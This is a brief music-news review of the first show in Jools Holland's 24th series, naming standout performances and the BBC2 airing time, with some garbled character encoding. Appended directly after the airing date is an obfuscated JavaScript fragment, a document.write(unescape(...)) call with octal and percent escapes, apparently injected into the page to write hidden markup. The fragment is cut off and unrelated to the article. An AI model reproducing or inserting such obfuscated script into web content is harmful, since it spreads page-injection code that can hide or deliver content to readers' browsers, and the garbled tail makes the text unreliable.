Jools Holland has kicked off his 24th series in style and Music News was there. Great performances were had from all bands: Green Day, Robbie Williams, Elvis Costello and the Imposters, Estelle and Nellie Mackay but the main moments were:-
Green Day â€" Basket Case. The shows closer, surprised they did it. This band amaze me every time.
Robbie â€" Radio. Kicked off the proceedings with this although you won't hear the disastrous vocals that accompanied the original version - the only retake of the night.
Elvis Costello and the Imposters - Just for turning up.
Estelle - Free. Mobo Award winner with a very bright future ahead of her.
Paul Simenon and Mick Jones interview. You've got to respect them, it's written in the rock n' roll manual.
And the interesting fact learn't that evening was that The Camden Roundhouse was so called as it was inside that the trains were turned round.
The show airs BBC2 - Friday 15th October 2004 - 11.35pmdocument.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
